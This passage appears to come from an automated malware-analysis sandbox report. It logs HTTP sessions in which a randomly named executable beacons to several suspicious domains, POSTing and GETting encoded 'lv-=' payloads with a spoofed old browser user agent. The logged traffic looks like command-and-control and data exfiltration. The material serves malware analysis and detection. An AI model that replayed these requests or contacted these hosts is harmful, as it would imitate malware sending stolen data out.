                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.lexpaidshares.online
                                                      Referer: http://www.lexpaidshares.online/93w6/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 59 39 43 56 47 72 7a 41 47 69 65 50 37 57 69 38 4b 64 44 6c 72 4e 34 49 5a 4b 4e 50 4a 43 4e 4b 2f 48 35 48 6b 77 57 48 75 2b 52 77 66 73 37 6f 6f 58 2b 68 77 56 78 56 37 32 46 55 57 70 4d 5a 6b 75 79 65 4b 71 55 6e 38 54 41 45 48 78 46 54 48 64 77 4c 47 6b 6c 54 33 4f 6e 79 6d 38 62 53 71 44 37 61 6f 6d 58 4c 31 67 42 42 2f 6f 34 4f 75 5a 72 2b 45 5a 30 37 58 38 72 5a 76 55 50 74 55 46 33 73 76 71 32 46 59 34 61 53 71 74 49 37 6d 44 44 35 4d 41 79 34 4e 39 63 32 41 34 67 66 70 37 65 6f 48 64 6d 47 33 74 50 57 68 71 7a 62 4e 46 33 2f 48 57 70 78 39 63 6c 58 6d 48 6c 6d 69 36 68 4c 6d 6d 4e 76 2f 75 79 33 39 2f 47 42 48 52 70 55 55 6f 73 6a 41 31 44 4f 61 68 7a 55 5a 6c 4c 65 31 49 7a 5a 45 52 37 32 46 57 79 5a 37 7a 34 58 59 36 75 2b 57 53 52 65 6d 47 30 56 4f 51 66 31 41 75 34 76 46 51 74 4e 36 38 46 72 64 47 37 47 4d 4c 54 38 6d 65 4f 53 77 73 71 45 6f 77 5a 6e 54 73 44 47 65 62 47 54 70 68 57 76 54 67 67 37 57 45 58 79 74 6c 4f 61 45 76 79 71 62 59 4d 63 64 75 53 4a 6f 6f 6c 51 46 78 [TRUNCATED]
                                                      Data Ascii: lv-=Y9CVGrzAGieP7Wi8KdDlrN4IZKNPJCNK/H5HkwWHu+Rwfs7ooX+hwVxV72FUWpMZkuyeKqUn8TAEHxFTHdwLGklT3Onym8bSqD7aomXL1gBB/o4OuZr+EZ07X8rZvUPtUF3svq2FY4aSqtI7mDD5MAy4N9c2A4gfp7eoHdmG3tPWhqzbNF3/HWpx9clXmHlmi6hLmmNv/uy39/GBHRpUUosjA1DOahzUZlLe1IzZER72FWyZ7z4XY6u+WSRemG0VOQf1Au4vFQtN68FrdG7GMLT8meOSwsqEowZnTsDGebGTphWvTgg7WEXytlOaEvyqbYMcduSJoolQFx37ENlavDePDzvZ+h9W8M8I/zs5ZT9GOWg481+qpxXrVEmJ/vXc7CwS8TYEbi81oFCJjHkuGMy9buawpf2Y6moe/tc06r6I4G+lxSbhqMvgFijoKgjEnA8Le0VgAIxBgi5L+vsR28TQ67LgG8Tti16TNuvt+fjb9M0Qy0ZvgXNutwV778FkW372vFjRe8I247yX0PnNueKoCB6BpK9042m2x9oL9PNAWqnFvQp3ZR706SiYOeO4DsPl1d9eLxEOEvxwsJ2GY37D+CkPiFAXerKDjKy0RHvXKugoFrW/7HPOu9e2GSzgaZ8ye7TQe0bkGzXIChlL9xZ06O3URaFMutFVJtxSWkNaP4J5KXt8lOf2nppY1UJr7mRvLPuNsA3jXB6hlKXoVvrek60l2pNU1SqbYYXsHs8whoqGBLhxeAPuKz415j3h6o4yWTGVcThCw28EU8GwTuCFCrzQ340U0KSMTf6fFPpRRky8tw+uF7sKQpGqpvXgrGCaR7wbCoi2aEYZh1yephUmxZOXzoTedIRivkZON1+Pu8MEoN9bGZO96dcma6k1HcCsOeSRpHrgnxvkRClXcsyyoCLUbbh69Q3QKwGRdtLXAiZPqa0L8znyaLoOXLOsxu/mPyP8v+J2C3uH2M6RxrzSbq2U3aLbL0VS9T9TS9l3wpDr [TRUNCATED]
                                                      Jul 9, 2024 12:10:46.793827057 CEST410INHTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:10:46 GMT
                                                      Location: https://www.lexpaidshares.online/93w6/
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.949755142.250.185.147805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:48.702397108 CEST572OUTGET /93w6/?lv-=V/q1FcXKAyKh7SGyOejAnJ1gdaJ4XypCrXBTkGu72NAGD53UqF3q83lE5VJRfawQqtKzEaQzvnU+DANXYfAkHXtawOjKvPvgjxfsrSG69BVdxcUkzQ==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.lexpaidshares.online
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:49.407016039 CEST549INHTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:10:49 GMT
                                                      Location: https://www.lexpaidshares.online/93w6/?lv-=V/q1FcXKAyKh7SGyOejAnJ1gdaJ4XypCrXBTkGu72NAGD53UqF3q83lE5VJRfawQqtKzEaQzvnU+DANXYfAkHXtawOjKvPvgjxfsrSG69BVdxcUkzQ%3D%3D&GJtTF=-FH8yJw
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.949756185.181.104.242805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:54.515111923 CEST826OUTPOST /br0f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.viertage.work
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.viertage.work
                                                      Referer: http://www.viertage.work/br0f/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6a 69 4b 65 2b 72 55 35 4e 52 61 46 52 72 59 31 47 34 70 66 7a 66 64 62 32 42 52 7a 6a 42 6e 35 43 4d 52 5a 6d 4f 75 72 6d 6b 69 69 63 32 54 4f 4f 57 30 67 54 68 53 4a 46 73 50 5a 39 57 32 76 77 55 43 35 32 39 51 4e 70 61 70 52 67 55 64 5a 44 74 77 70 39 57 57 39 39 75 41 70 4e 53 70 52 31 49 66 34 43 66 6d 71 6b 69 4a 52 35 55 30 53 73 4c 49 51 66 50 70 53 6c 31 78 4b 57 65 4b 6a 75 56 30 2b 48 45 49 2f 4b 6e 72 32 69 48 41 4f 39 36 56 63 2b 57 70 5a 39 67 32 30 44 6c 4b 7a 48 48 41 6b 32 4a 43 78 71 39 61 58 33 37 34 79 50 6e 7a 72 75 4c 52 42 71 6d 7a 75
                                                      Data Ascii: lv-=jiKe+rU5NRaFRrY1G4pfzfdb2BRzjBn5CMRZmOurmkiic2TOOW0gThSJFsPZ9W2vwUC529QNpapRgUdZDtwp9WW99uApNSpR1If4CfmqkiJR5U0SsLIQfPpSl1xKWeKjuV0+HEI/Knr2iHAO96Vc+WpZ9g20DlKzHHAk2JCxq9aX374yPnzruLRBqmzu
                                                      Jul 9, 2024 12:10:55.101762056 CEST978INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Tue, 09 Jul 2024 10:10:55 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Expires: Tue, 09 Jul 2024 11:10:55 GMT
                                                      Cache-Control: max-age=3600
                                                      Pragma: public
                                                      Cache-Control: public
                                                      Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval'
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Xss-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      X-Request-Id: 0784209fa0b90472403075fe1c2cd474
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 61 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 6d 90 51 6f da 30 14 85 9f 9b 5f 71 eb 67 12 8f 55 93 0a 4b 22 ad 40 d5 4a 94 54 5d b6 76 4f 95 49 6e c0 9a e3 64 f6 85 90 fe fa dd 14 36 21 6d 7e ba b6 7c ce fd ce 89 2f e7 d9 2c ff f1 b8 80 2d d5 06 1e bf dd 2c ef 67 20 42 29 9f af 66 52 ce f3 39 bc dc e5 0f 4b 18 47 1f e0 d6 a9 1a 3d 92 94 8b 95 08 c4 96 a8 9d 4a d9 75 5d d4 5d 45 8d db c8 fc 49 1e 06 9f f1 20 3c 8d 61 75 52 45 25 95 22 0d e2 f7 45 87 da 58 9f fc c7 62 3c 99 4c 8e 4a 01 fc 69 6a 94 dd 24 02 ad 80 bf 13 7b 5c c2 83 b2 6a 83 25 ac 7b 50 d6 eb b5 41 70 8d c1 29 68 db 1d 5e b5 55 05 e9 3d be 96 4d ad b4 f5 30 ec 45 55 a6 01 f0 89 6b 24 c5 81 a9 0d f1 d7 4e ef 13 51 34 96 d0 52 48 7d 8b 02 4e b7 44 10 1e 48 0e bc 9f a1 d8 2a c7 d1 13 ed 9b f0 fa fa d3 24 1c 0b 90 e7 76 96 bb 49 c4 53 76 93 e5 5f cf 2c 56 d9 fd 6a be 78 19 c1 2a bb cd 96 cb ec 99 2b 78 67 20 4d 06 d3 a1 bc bd 46 47 1c 26 ea 1a f7 13 b6 ca c3 1a d1 82 c3 8d f6 84 0e cb 58 1e 3f 07 b1 3c 86 88 d7 4d d9 a7 c1 45 dc 82 32 7a 63 [TRUNCATED]
                                                      Data Ascii: 1admQo0_qgUK"@JT]vOInd6!m~|/,-,g B)fR9KG=Ju]]EI <auRE%"EXb<LJij${\j%{PAp)h^U=M0EUk$NQ4RH}NDH*$vISv_,Vjx*+xg MFG&X?<ME2zc9c,Pi+|qZ#_<:],c+Eoz`-.L5op0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.949757185.181.104.242805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:57.095263958 CEST850OUTPOST /br0f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.viertage.work
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.viertage.work
                                                      Referer: http://www.viertage.work/br0f/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6a 69 4b 65 2b 72 55 35 4e 52 61 46 53 4c 6f 31 46 62 78 66 79 2f 64 45 35 68 52 7a 74 68 6d 77 43 4d 64 5a 6d 4b 2f 77 6e 58 4b 69 63 55 4c 4f 50 53 6f 67 55 68 53 4a 4f 4d 50 51 7a 32 33 74 77 55 65 41 32 2f 45 4e 70 61 74 52 67 51 56 5a 41 61 45 6d 2b 6d 57 37 37 75 41 72 44 79 70 52 31 49 66 34 43 65 43 51 6b 6a 68 52 34 6c 45 53 74 76 63 58 53 76 70 52 31 6c 78 4b 41 75 4c 4c 75 56 30 51 48 46 55 5a 4b 6b 54 32 69 44 45 4f 2b 76 35 64 77 57 70 66 67 51 33 2b 46 46 2f 58 42 78 67 2f 77 72 43 7a 31 4c 57 49 77 61 59 73 65 56 36 77 37 63 52 6d 74 42 36 47 43 57 56 4e 75 73 33 5a 36 65 73 30 49 64 4d 67 6b 6e 69 79 62 51 3d 3d
                                                      Data Ascii: lv-=jiKe+rU5NRaFSLo1Fbxfy/dE5hRzthmwCMdZmK/wnXKicULOPSogUhSJOMPQz23twUeA2/ENpatRgQVZAaEm+mW77uArDypR1If4CeCQkjhR4lEStvcXSvpR1lxKAuLLuV0QHFUZKkT2iDEO+v5dwWpfgQ3+FF/XBxg/wrCz1LWIwaYseV6w7cRmtB6GCWVNus3Z6es0IdMgkniybQ==
                                                      Jul 9, 2024 12:10:57.710562944 CEST978INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Tue, 09 Jul 2024 10:10:57 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Expires: Tue, 09 Jul 2024 11:10:57 GMT
                                                      Cache-Control: max-age=3600
                                                      Pragma: public
                                                      Cache-Control: public
                                                      Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval'
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Xss-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      X-Request-Id: e53b8286c611ec5218bfec172a6c2a78
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 61 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 6d 90 51 6f da 30 14 85 9f 9b 5f 71 eb 67 12 8f 55 93 0a 4b 22 ad 40 d5 4a 94 54 5d b6 76 4f 95 49 6e c0 9a e3 64 f6 85 90 fe fa dd 14 36 21 6d 7e ba b6 7c ce fd ce 89 2f e7 d9 2c ff f1 b8 80 2d d5 06 1e bf dd 2c ef 67 20 42 29 9f af 66 52 ce f3 39 bc dc e5 0f 4b 18 47 1f e0 d6 a9 1a 3d 92 94 8b 95 08 c4 96 a8 9d 4a d9 75 5d d4 5d 45 8d db c8 fc 49 1e 06 9f f1 20 3c 8d 61 75 52 45 25 95 22 0d e2 f7 45 87 da 58 9f fc c7 62 3c 99 4c 8e 4a 01 fc 69 6a 94 dd 24 02 ad 80 bf 13 7b 5c c2 83 b2 6a 83 25 ac 7b 50 d6 eb b5 41 70 8d c1 29 68 db 1d 5e b5 55 05 e9 3d be 96 4d ad b4 f5 30 ec 45 55 a6 01 f0 89 6b 24 c5 81 a9 0d f1 d7 4e ef 13 51 34 96 d0 52 48 7d 8b 02 4e b7 44 10 1e 48 0e bc 9f a1 d8 2a c7 d1 13 ed 9b f0 fa fa d3 24 1c 0b 90 e7 76 96 bb 49 c4 53 76 93 e5 5f cf 2c 56 d9 fd 6a be 78 19 c1 2a bb cd 96 cb ec 99 2b 78 67 20 4d 06 d3 a1 bc bd 46 47 1c 26 ea 1a f7 13 b6 ca c3 1a d1 82 c3 8d f6 84 0e cb 58 1e 3f 07 b1 3c 86 88 d7 4d d9 a7 c1 45 dc 82 32 7a 63 [TRUNCATED]
                                                      Data Ascii: 1admQo0_qgUK"@JT]vOInd6!m~|/,-,g B)fR9KG=Ju]]EI <auRE%"EXb<LJij${\j%{PAp)h^U=M0EUk$NQ4RH}NDH*$vISv_,Vjx*+xg MFG&X?<ME2zc9c,Pi+|qZ#_<:],c+Eoz`-.L5op0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.949758185.181.104.242805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:10:59.676304102 CEST1863OUTPOST /br0f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.viertage.work
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.viertage.work
                                                      Referer: http://www.viertage.work/br0f/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6a 69 4b 65 2b 72 55 35 4e 52 61 46 53 4c 6f 31 46 62 78 66 79 2f 64 45 35 68 52 7a 74 68 6d 77 43 4d 64 5a 6d 4b 2f 77 6e 52 53 69 64 6c 72 4f 4f 7a 6f 67 56 68 53 4a 4e 4d 50 64 7a 32 33 73 77 55 58 49 32 2f 59 33 70 5a 46 52 68 33 56 5a 42 75 59 6d 6c 57 57 37 35 75 41 6f 4e 53 70 2b 31 49 50 38 43 66 79 51 6b 6a 68 52 34 6d 63 53 70 37 49 58 42 66 70 53 6c 31 78 4f 57 65 4b 6d 75 56 73 6d 48 46 51 57 4a 55 7a 32 37 6a 55 4f 34 64 42 64 38 57 70 64 6a 51 32 72 46 46 6a 49 42 77 49 46 77 71 32 56 31 4d 36 49 31 75 6b 36 61 57 2b 36 6a 2f 52 55 71 42 75 43 4c 57 4a 79 32 6f 65 6d 74 66 70 57 51 74 39 76 69 6c 76 45 4b 6c 62 2b 57 46 5a 5a 63 41 4c 6e 77 67 34 77 31 6f 33 73 2b 32 4d 7a 2f 42 76 55 59 34 36 51 58 30 55 45 73 51 4c 4c 32 4b 6c 6d 61 2b 32 50 36 72 65 73 52 4b 5a 77 76 44 61 6c 78 72 56 78 53 6d 57 44 78 6f 68 4d 6a 4f 59 54 59 37 32 6a 4c 6c 58 67 6d 48 48 5a 57 56 49 73 64 6e 4f 7a 64 51 72 6b 49 76 70 72 36 79 5a 56 2f 53 48 2f 6c 6d 43 70 52 57 54 51 57 53 63 6d 64 37 [TRUNCATED]
                                                      Data Ascii: lv-=jiKe+rU5NRaFSLo1Fbxfy/dE5hRzthmwCMdZmK/wnRSidlrOOzogVhSJNMPdz23swUXI2/Y3pZFRh3VZBuYmlWW75uAoNSp+1IP8CfyQkjhR4mcSp7IXBfpSl1xOWeKmuVsmHFQWJUz27jUO4dBd8WpdjQ2rFFjIBwIFwq2V1M6I1uk6aW+6j/RUqBuCLWJy2oemtfpWQt9vilvEKlb+WFZZcALnwg4w1o3s+2Mz/BvUY46QX0UEsQLL2Klma+2P6resRKZwvDalxrVxSmWDxohMjOYTY72jLlXgmHHZWVIsdnOzdQrkIvpr6yZV/SH/lmCpRWTQWScmd7Eu7AMXt91isp7sB1vAHdIeWfODM8SdlFbCJfusVYIFtIIIXue/DBcJrzGhfRLUDq2crEmXKH1ci9P51e2POXmyH45fOub8IThH03w6hpgQI76djgLj2IcP9nzGQMSrLpIFkG2PTWUZUWNlkpCG7wUA4NnBOsbYCIWuM8zn1Yi/+LqQQ5uPM1rOFQ/3aOVWBja/uN98B1f8Mxj/B/OuWMZu6om6hHjJ5/AdM1Wv6rcARvrIZr97LqHF8LI4dhEqyDk5GcGM43NP3d0sfulz2sfxJaScP2m0KtAaxsjQmXawdh+JFKMPqeqZ6+eGisSa5r71DWum3AUtEWtFGX4LbOILaoG0PjjYIurJw1i5fnhJu+t7WXgMBVWFsVbnwJDnZjwVS7yYA4YPJNVA7J+5kZfPsUJrFJIwWX6J221nO/oc0IAfFgGqppjrl9YPQA3oD32rQtz+ryTZgq7OSaQD9+HhPyjMBnwaUmZmGCj3SMDFiG1TUIPuXzrbymj9FQ1JqWq5fbTm75BcZ5t0+xSXr/hKRzlrYkGLzlXJlqEGZpOpWhG1xZH9OBGz1HJWH8zLbbRFpyHWzEx8bh8f97RYGB6j8qmUDHiPTdJgzxea77Z2tTGoIzhYIFOpcHtjSonz/cIO1RXQvAAiWBLbirQor24CAi8Dw/dmiAG6 [TRUNCATED]
                                                      Jul 9, 2024 12:11:00.287606955 CEST978INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Tue, 09 Jul 2024 10:11:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Expires: Tue, 09 Jul 2024 11:11:00 GMT
                                                      Cache-Control: max-age=3600
                                                      Pragma: public
                                                      Cache-Control: public
                                                      Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval'
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Xss-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      X-Request-Id: 004b3f8042813d09bc15aceac1963669
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 61 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 6d 90 51 6f da 30 14 85 9f 9b 5f 71 eb 67 12 8f 55 93 0a 4b 22 ad 40 d5 4a 94 54 5d b6 76 4f 95 49 6e c0 9a e3 64 f6 85 90 fe fa dd 14 36 21 6d 7e ba b6 7c ce fd ce 89 2f e7 d9 2c ff f1 b8 80 2d d5 06 1e bf dd 2c ef 67 20 42 29 9f af 66 52 ce f3 39 bc dc e5 0f 4b 18 47 1f e0 d6 a9 1a 3d 92 94 8b 95 08 c4 96 a8 9d 4a d9 75 5d d4 5d 45 8d db c8 fc 49 1e 06 9f f1 20 3c 8d 61 75 52 45 25 95 22 0d e2 f7 45 87 da 58 9f fc c7 62 3c 99 4c 8e 4a 01 fc 69 6a 94 dd 24 02 ad 80 bf 13 7b 5c c2 83 b2 6a 83 25 ac 7b 50 d6 eb b5 41 70 8d c1 29 68 db 1d 5e b5 55 05 e9 3d be 96 4d ad b4 f5 30 ec 45 55 a6 01 f0 89 6b 24 c5 81 a9 0d f1 d7 4e ef 13 51 34 96 d0 52 48 7d 8b 02 4e b7 44 10 1e 48 0e bc 9f a1 d8 2a c7 d1 13 ed 9b f0 fa fa d3 24 1c 0b 90 e7 76 96 bb 49 c4 53 76 93 e5 5f cf 2c 56 d9 fd 6a be 78 19 c1 2a bb cd 96 cb ec 99 2b 78 67 20 4d 06 d3 a1 bc bd 46 47 1c 26 ea 1a f7 13 b6 ca c3 1a d1 82 c3 8d f6 84 0e cb 58 1e 3f 07 b1 3c 86 88 d7 4d d9 a7 c1 45 dc 82 32 7a 63 [TRUNCATED]
                                                      Data Ascii: 1admQo0_qgUK"@JT]vOInd6!m~|/,-,g B)fR9KG=Ju]]EI <auRE%"EXb<LJij${\j%{PAp)h^U=M0EUk$NQ4RH}NDH*$vISv_,Vjx*+xg MFG&X?<ME2zc9c,Pi+|qZ#_<:],c+Eoz`-.L5op0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.949759185.181.104.242805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:11:02.820585012 CEST565OUTGET /br0f/?lv-=ugi+9bpxNAaZR8wICrxq2eMEzwxItzjvBeZsufXo3FfvAETDHi1JbXCTNdvb4BDU5HS2z+wM6O9UukgZHdIpmHivweVWPh9LzIjwD/7QkR1e8x0qwg==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.viertage.work
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:11:03.412784100 CEST1149INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Tue, 09 Jul 2024 10:11:03 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Expires: Tue, 09 Jul 2024 11:11:03 GMT
                                                      Cache-Control: max-age=3600
                                                      Pragma: public
                                                      Cache-Control: public
                                                      Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval'
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Xss-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      X-Request-Id: c9bd29aa721ebb45071c8c9ef77a78b1
                                                      Data Raw: 32 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 21 20 4d 61 6e 61 67 65 64 20 62 79 20 61 6e 73 69 62 6c 65 20 72 6f 6c 65 3a 20 69 6e 77 78 5f 69 6e 61 63 74 69 76 65 5f 64 6f 6d 61 69 6e 73 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d [TRUNCATED]
                                                      Data Ascii: 270<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><! Managed by ansible role: inwx_inactive_domains ><head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /> <meta name="ROBOTS" content="NOINDEX, NOFOLLOW"> <title>www.viertage.work has been registered</title></head><body><p align="center"><font face="Verdana, Arial, Helvetica, serif" size=2>www.viertage.work was successfully registered. There is no content yet.</font></p></body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.94976038.145.202.186805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:11:08.956190109 CEST829OUTPOST /roex/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.9988566a4.shop
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.9988566a4.shop
                                                      Referer: http://www.9988566a4.shop/roex/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
